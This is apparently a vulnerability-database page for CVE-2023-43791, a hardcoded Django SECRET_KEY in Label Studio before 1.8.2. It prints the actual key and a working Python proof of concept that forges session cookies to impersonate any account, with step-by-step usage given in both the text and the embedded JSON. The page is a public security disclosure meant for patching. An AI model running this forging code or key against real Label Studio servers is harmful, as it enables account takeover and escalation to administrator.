                "Vendor Advisory"
              ],
              "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m"
            },
            {
              "name": "https://github.com/HumanSignal/label-studio/pull/4690",
              "refsource": "",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/HumanSignal/label-studio/pull/4690"
            },
            {
              "name": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b",
              "refsource": "",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b"
            },
            {
              "name": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2",
              "refsource": "",
              "tags": [
                "Release Notes"
              ],
              "url": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-11-18T00:55Z",
      "publishedDate": "2023-11-09T15:15Z"
    }
  }
}

PYSEC-2023-274

Vulnerability from pysec - Published: 2023-11-09 15:15 - Updated: 2024-11-21 14:22

Details

Severity ?

8.8 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Impacted products

Name	purl
label-studio	pkg:pypi/label-studio

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "label-studio",
        "purl": "pkg:pypi/label-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3d06c5131c15600621e08b06f07d976887cde81b"
            }
          ],
          "repo": "https://github.com/HumanSignal/label-studio",
          "type": "GIT"
        },
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.4.1",
        "0.4.2",
        "0.4.3",
        "0.4.4",
        "0.4.4.post1",
        "0.4.4.post2",
        "0.4.5",
        "0.4.6",
        "0.4.6.post1",
        "0.4.6.post2",
        "0.4.7",
        "0.4.8",
        "0.5.0",
        "0.5.1",
        "0.6.0",
        "0.6.1",
        "0.7.0",
        "0.7.1",
        "0.7.2",
        "0.7.3",
        "0.7.4",
        "0.7.4.post0",
        "0.7.4.post1",
        "0.7.5.post1",
        "0.7.5.post2",
        "0.8.0",
        "0.8.0.post0",
        "0.8.1",
        "0.8.1.post0",
        "0.8.2",
        "0.8.2.post0",
        "0.9.0",
        "0.9.0.post2",
        "0.9.0.post3",
        "0.9.0.post4",
        "0.9.0.post5",
        "0.9.1",
        "0.9.1.post0",
        "0.9.1.post1",
        "0.9.1.post2",
        "1.0.0",
        "1.0.0.post0",
        "1.0.0.post1",
        "1.0.0.post2",
        "1.0.0.post3",
        "1.0.1",
        "1.0.2",
        "1.0.2.post0",
        "1.1.0",
        "1.1.0rc0",
        "1.1.1",
        "1.2",
        "1.3",
        "1.3.post0",
        "1.3.post1",
        "1.4",
        "1.4.1",
        "1.4.1.post0",
        "1.4.1.post1",
        "1.5.0",
        "1.5.0.post0",
        "1.6.0",
        "1.7.0",
        "1.7.1",
        "1.7.2",
        "1.7.3",
        "1.8.0",
        "1.8.1"
      ]
    }
  ],
  "aliases": [
    "CVE-2023-43791",
    "GHSA-f475-x83m-rx5m"
  ],
  "details": "Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced.",
  "id": "PYSEC-2023-274",
  "modified": "2024-11-21T14:22:53.173192+00:00",
  "published": "2023-11-09T15:15:00+00:00",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m"
    },
    {
      "type": "FIX",
      "url": "https://github.com/HumanSignal/label-studio/pull/4690"
    },
    {
      "type": "FIX",
      "url": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F475-X83M-RX5M

Vulnerability from github – Published: 2023-11-09 14:42 – Updated: 2024-11-22 17:55

Summary

Label Studio has Hardcoded Django `SECRET_KEY` that can be Abused to Forge Session Tokens

Details

Introduction

This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability was found to affect versions before 1.8.2, where a patch was introduced.

Overview

In Label Studio version 1.8.1, a hard coded Django SECRET_KEY was set in the application settings. The Django SECRET_KEY is used for signing session tokens by the web application framework, and should never be shared with unauthorised parties.

However, the Django framework inserts a _auth_user_hash claim in the session token that is a HMAC hash of the account's password hash. That claim would normally prevent forging a valid Django session token without knowing the password hash of the account. However, any authenticated user can exploit an Object Relational Mapper (ORM) Leak vulnerability in Label Studio to leak the password hash of any account on the platform, which is reported as a separate vulnerability. An attacker can exploit the ORM Leak vulnerability (which was patched in 1.9.2post0) and forge session tokens for all users on Label Studio using the hard coded SECRET_KEY.

Description

Below is the code snippet of the Django settings file at label_studio/core/settings/base.py.

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n'

This secret is hard coded across all instances of Label Studio.

Proof of Concept

Below are the steps that an attacker could do to forge a session token of any account on Label Studio:

Exploit the ORM Leak vulnerability (patched in 1.9.2post0) in Label Studio to retrieve the full password hash that will be impersonated. For this example, a session token will be forged for an account with the email ghostccamm@testvm.local with the password hash pbkdf2_sha256$260000$KKeew1othBwMKk2QudmEgb$ALiopdBpWMwMDD628xeE1Ie7YSsKxdXdvWfo/PvVXvw= that was retrieved.
Create a new Django project with an empty application. In cookieforge/cookieforge/settings.py set the SECRET_KEY to $(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n. Create a management command with the following code that will be used to create forged session tokens.

from typing import Any
from django.core.management.base import  BaseCommand, CommandParser
from django.core import signing
from django.utils.crypto import salted_hmac
from django.conf import settings
import time, uuid

class Command(BaseCommand):
    help = "Forge a users session cookie on Label Studio"

    def add_arguments(self, parser: CommandParser) -> None:
        parser.add_argument(
            '-o', '--organisation',
            help='Organisation ID to access',
            default=1,
            type=int
        )

        parser.add_argument(
            'user_id',
            help='The User ID of the victim you want to impersonate',
            type=str
        )

        parser.add_argument(
            'user_hash',
            help='The password hash the user you want to impersonate'
        )

    def handle(self, *args: Any, **options: Any) -> str | None:
        key = settings.SECRET_KEY
        # Creates the _auth_user_hash HMAC of the victim's password hash
        auth_user_hash = salted_hmac(
            'django.contrib.auth.models.AbstractBaseUser.get_session_auth_hash',
            options['user_hash'],
            secret=key,
            algorithm="sha256"
        ).hexdigest()

        session_dict = {
            'uid': str(uuid.uuid4()), 
            'organization_pk': options['organisation'], 
            'next_page': '/projects/', 
            'last_login': time.time(), 
            '_auth_user_id': options['user_id'], 
            '_auth_user_backend': 
            'django.contrib.auth.backends.ModelBackend', 
            '_auth_user_hash': auth_user_hash, 
            'keep_me_logged_in': True, 
            '_session_expiry': 600
        }

        # Creates a forged session token
        session_token = signing.dumps(
            session_dict,
            key=key,
            salt="django.contrib.sessions.backends.signed_cookies",
            compress=True
        )

        self.stdout.write(
            self.style.SUCCESS(f"session token: {session_token}")
        )

Next run the following command replacing the {user_id} with the user ID of the account you want to the impersonate and {user_hash} with the victim's password hash. Copy the session token that is printed.

python3 manage.py forgecookie {user_id} '{user_hash}'

Change the sessionid cookie on the browser and refresh the page. Observe being authenticated as the victim user.

Impact

This vulnerability can be chained with the ORM Leak vulnerability (which was patched in 1.9.2post0) in Label Studio to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user.

Remediation Advice

It is important to note that the hard coded SECRET_KEY has already been removed in Label Studio versions >=1.8.2. However, there has not been any public disclosure about the use of the hard coded secret key and users have not been informed about the security vulnerability.

We recommend that Human Signal to release a public disclosure about the hard coded SECRET_KEY to encourage users to patch to a version >=1.8.2 to mitigate the likelihood of an attacker exploiting these vulnerabilities to impersonate all accounts on the platform.

Discovered

August 2023, Robert Schuh, @robbilie
August 2023, Alex Brown, elttam

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "label-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-43791"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-09T14:42:58Z",
    "nvd_published_at": "2023-11-09T15:15:08Z",
    "severity": "CRITICAL"
  },
  "details": "# Introduction\n\nThis write-up describes a vulnerability found in [Label Studio](https://github.com/HumanSignal/label-studio), a popular open source data labeling tool. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced.\n\n# Overview\n\nIn [Label Studio version 1.8.1](https://github.com/HumanSignal/label-studio/tree/1.8.1), a hard coded Django `SECRET_KEY` was set in the application settings. The Django `SECRET_KEY` is used for signing session tokens by the web application framework, and should never be shared with unauthorised parties.\n\nHowever, the Django framework inserts a `_auth_user_hash` claim in the session token that is a HMAC hash of the account\u0027s password hash. That claim would normally prevent forging a valid Django session token without knowing the password hash of the account. However, any authenticated user can exploit an Object Relational Mapper (ORM) Leak vulnerability in Label Studio to leak the password hash of any account on the platform, which is reported as a separate vulnerability. An attacker can exploit the ORM Leak vulnerability (which was patched in [`1.9.2post0`](https://github.com/HumanSignal/label-studio/releases/tag/1.9.2.post0)) and forge session tokens for all users on Label Studio using the hard coded `SECRET_KEY`.\n\n# Description\n\nBelow is the code snippet of the Django settings file at [`label_studio/core/settings/base.py`](https://github.com/HumanSignal/label-studio/blob/1.8.1/label_studio/core/settings/base.py#L108).\n\n```python\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = \u0027$(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n\u0027\n```\n\nThis secret is hard coded across all instances of Label Studio.\n\n# Proof of Concept\n\nBelow are the steps that an attacker could do to forge a session token of any account on Label Studio:\n\n1. Exploit the ORM Leak vulnerability (patched in [`1.9.2post0`](https://github.com/HumanSignal/label-studio/releases/tag/1.9.2.post0)) in Label Studio to retrieve the full password hash that will be impersonated. For this example, a session token will be forged for an account with the email `ghostccamm@testvm.local` with the password hash `pbkdf2_sha256$260000$KKeew1othBwMKk2QudmEgb$ALiopdBpWMwMDD628xeE1Ie7YSsKxdXdvWfo/PvVXvw=` that was retrieved.\n\n2. Create a new Django project with an empty application. In `cookieforge/cookieforge/settings.py` set the `SECRET_KEY` to `$(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n`. Create a management command with the following code that will be used to create forged session tokens.\n\n```python\nfrom typing import Any\nfrom django.core.management.base import  BaseCommand, CommandParser\nfrom django.core import signing\nfrom django.utils.crypto import salted_hmac\nfrom django.conf import settings\nimport time, uuid\n\nclass Command(BaseCommand):\n    help = \"Forge a users session cookie on Label Studio\"\n\n    def add_arguments(self, parser: CommandParser) -\u003e None:\n        parser.add_argument(\n            \u0027-o\u0027, \u0027--organisation\u0027,\n            help=\u0027Organisation ID to access\u0027,\n            default=1,\n            type=int\n        )\n\n        parser.add_argument(\n            \u0027user_id\u0027,\n            help=\u0027The User ID of the victim you want to impersonate\u0027,\n            type=str\n        )\n\n        parser.add_argument(\n            \u0027user_hash\u0027,\n            help=\u0027The password hash the user you want to impersonate\u0027\n        )\n\n    def handle(self, *args: Any, **options: Any) -\u003e str | None:\n        key = settings.SECRET_KEY\n        # Creates the _auth_user_hash HMAC of the victim\u0027s password hash\n        auth_user_hash = salted_hmac(\n            \u0027django.contrib.auth.models.AbstractBaseUser.get_session_auth_hash\u0027,\n            options[\u0027user_hash\u0027],\n            secret=key,\n            algorithm=\"sha256\"\n        ).hexdigest()\n\n        session_dict = {\n            \u0027uid\u0027: str(uuid.uuid4()), \n            \u0027organization_pk\u0027: options[\u0027organisation\u0027], \n            \u0027next_page\u0027: \u0027/projects/\u0027, \n            \u0027last_login\u0027: time.time(), \n            \u0027_auth_user_id\u0027: options[\u0027user_id\u0027], \n            \u0027_auth_user_backend\u0027: \n            \u0027django.contrib.auth.backends.ModelBackend\u0027, \n            \u0027_auth_user_hash\u0027: auth_user_hash, \n            \u0027keep_me_logged_in\u0027: True, \n            \u0027_session_expiry\u0027: 600\n        }\n\n        # Creates a forged session token\n        session_token = signing.dumps(\n            session_dict,\n            key=key,\n            salt=\"django.contrib.sessions.backends.signed_cookies\",\n            compress=True\n        )\n\n        self.stdout.write(\n            self.style.SUCCESS(f\"session token: {session_token}\")\n        )\n```\n\n3. Next run the following command replacing the `{user_id}` with the user ID of the account you want to the impersonate and `{user_hash}` with the victim\u0027s password hash. Copy the session token that is printed.\n\n```python\npython3 manage.py forgecookie {user_id} \u0027{user_hash}\u0027\n```\n\n4. Change the `sessionid` cookie on the browser and refresh the page. Observe being authenticated as the victim user.\n\n# Impact\n\nThis vulnerability can be chained with the ORM Leak vulnerability (which was patched in [`1.9.2post0`](https://github.com/HumanSignal/label-studio/releases/tag/1.9.2.post0)) in Label Studio to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user.\n\n# Remediation Advice\n\nIt is important to note that the hard coded `SECRET_KEY` has already been removed in Label Studio versions `\u003e=1.8.2`. However, there has not been any public disclosure about the use of the hard coded secret key and users have not been informed about the security vulnerability.\n\nWe recommend that Human Signal to release a public disclosure about the hard coded `SECRET_KEY` to encourage users to patch to a version `\u003e=1.8.2` to mitigate the likelihood of an attacker exploiting these vulnerabilities to impersonate all accounts on the platform.\n\n# Discovered\n- August 2023, Robert Schuh, @robbilie\n- August 2023, Alex Brown, elttam",
  "id": "GHSA-f475-x83m-rx5m",
  "modified": "2024-11-22T17:55:25Z",
  "published": "2023-11-09T14:42:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43791"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/pull/4690"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/HumanSignal/label-studio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/label-studio/PYSEC-2023-274.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Label Studio has Hardcoded Django `SECRET_KEY` that can be Abused to Forge Session Tokens"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2023-43791 (GCVE-0-2023-43791)

FKIE_CVE-2023-43791

GSD-2023-43791

PYSEC-2023-274

GHSA-F475-X83M-RX5M

Introduction

Overview

Description

Proof of Concept

Impact

Remediation Advice

Discovered

Tags

Sightings

Nomenclature